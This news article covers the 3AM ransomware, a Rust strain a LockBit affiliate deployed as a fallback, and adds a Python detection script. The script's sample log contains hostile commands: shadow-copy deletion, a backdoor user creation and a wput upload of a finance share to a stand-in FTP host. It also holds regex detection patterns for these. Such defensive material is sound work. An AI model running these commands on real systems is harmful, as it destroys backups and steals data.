A new ransomware family known as 3AM has come to light after an unnamed affiliate deployed it on a target network when their attempts to spread LockBit (a ransomware family attributed to Bitwise Spider or Syrphid) failed.
According to a report shared with The Hacker News by the Symantec Threat Hunter Team, part of Broadcom, "3AM is written in Rust and appears to be a completely new malware family."
Before it begins encrypting files, the ransomware tries to stop a number of services on the infected machine. Once encryption is complete, it attempts to delete Volume Shadow Copy Service (VSS) snapshots so that the victim cannot simply restore earlier file versions.
3AM takes its name from a reference to it in the ransom note; it also appends the .threeamtime extension to the files it encrypts. Whether the malware's developers are linked to any known e-crime groups is not yet known.
In the attack observed by Symantec, the attacker is said to have deployed the ransomware on three machines on the organisation's network, but it was blocked on two of them.
The intrusion is notable for its use of Cobalt Strike for post-exploitation and privilege escalation, followed by reconnaissance commands to identify further servers for lateral movement. The exact initial access vector is not known.
As Symantec pointed out, "They also added a new user for persistence and used the Wput tool to exfiltrate the victims' files to their own FTP server."
3AM is a 64-bit Rust executable that is designed to execute a series of commands to shut down several security and backup-related programmes, encrypt files that meet certain criteria, and delete volume shadow copies.
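The report describes a recognisable sequence on the infected host: services stopped, shadow copies deleted, a new local user added for persistence, and Wput used to push files to an attacker-controlled FTP server. The following detection is an added example, not Symantec's or The Hacker News' code. It runs over a few constructed process-creation log lines (loosely modelled on Sysmon Event ID 1 fields) and flags hosts on which several of those stages chain together. The specific command lines it matches (`vssadmin delete shadows`, `net stop`, `net user ... /add`, `wput ... ftp://`) are generic ransomware tradecraft chosen for the example; the report does not list 3AM's exact commands.

```python
"""Detect a 3AM-style pre-encryption and exfiltration chain in process logs.

Added example; the command-line patterns are assumptions about typical
ransomware tooling, not the commands 3AM is reported to run.
"""
import re
from collections import defaultdict

# (rule name, MITRE ATT&CK technique, regex over the process command line)
RULES = [
    ("shadow_copy_deletion", "T1490",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
                r"|wbadmin(\.exe)?\s+delete", re.I)),
    ("service_stop", "T1489",
     re.compile(r"\bnet1?(\.exe)?\s+stop\b|\bsc(\.exe)?\s+stop\b|taskkill(\.exe)?\s+.*/im\b", re.I)),
    ("local_account_created", "T1136.001",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("ftp_exfil_wput", "T1048.003",
     re.compile(r"\bwput(\.exe)?\b.*\bftp://", re.I)),
]

# Simple line format assumed for this example: "<ts> host=<h> user=<u> cmd=<command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

# Constructed sample log: one host showing the full chain, one showing routine admin noise.
SAMPLE_LOG = """\
2023-09-05T03:01:12Z host=FS01 user=CORP\\svc_backup cmd=net stop /y vss
2023-09-05T03:01:13Z host=FS01 user=CORP\\svc_backup cmd=vssadmin.exe delete shadows /all /quiet
2023-09-05T03:02:40Z host=FS01 user=CORP\\svc_backup cmd=net user helpdesk P@ssw0rd! /add
2023-09-05T03:05:07Z host=FS01 user=CORP\\svc_backup cmd=wput.exe -u -nc -B "C:\\Share\\finance" ftp://user:pass@203.0.113.10/loot/
2023-09-05T09:14:55Z host=WS22 user=CORP\\jsmith cmd=notepad.exe C:\\Users\\jsmith\\notes.txt
2023-09-05T10:20:01Z host=WS22 user=CORP\\jsmith cmd=net stop spooler
"""


def parse_line(line):
    """Return the event fields as a dict, or None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def match_rules(cmd):
    """Return [(rule name, technique id)] for every rule the command line trips."""
    return [(name, tid) for name, tid, rx in RULES if rx.search(cmd)]


def scan(log_text):
    """Parse the log and return one finding per (event, matched rule)."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        for name, tid in match_rules(ev["cmd"]):
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": name, "technique": tid, "cmd": ev["cmd"]})
    return findings


def flagged_hosts(findings, min_distinct_rules=2):
    """Hosts that trip at least min_distinct_rules different rules.

    A lone 'net stop' is routine administration; several stages of the
    chain on the same host within the same log window is not.
    """
    rules_by_host = defaultdict(set)
    for f in findings:
        rules_by_host[f["host"]].add(f["rule"])
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= min_distinct_rules)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['host']} {f['rule']} ({f['technique']}): {f['cmd']}")
    print("flagged:", flagged_hosts(found))
```

In production the same logic would sit on top of Sysmon, EDR or Windows Security 4688 telemetry rather than a text log, and the host-level correlation is what keeps the noisy `net stop` rule from paging anyone on its own.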
While the ransomware's origins remain unknown, a post published on Reddit on September 9, 2023 suggests that it is being used against other organisations as well.
"We've seen no evidence ourselves to suggest that this affiliate has used 3AM again, but we're not surprised to see other reports of 3AM's use," Dick O'Brien, chief intelligence analyst at Symantec, said in a statement to The Hacker News. "It suggests that attackers may perceive it as a credible threat if an experienced LockBit affiliate is using it as their alternate payload."
According to Symantec, "ransomware affiliates have grown more independent from ransomware operators."
"New ransomware families emerge often, but the majority either vanish just as fast or never manage to establish much foothold. However, the fact that a LockBit affiliate used 3AM as a fallback shows that attackers may be interested in it and it might appear again in the future."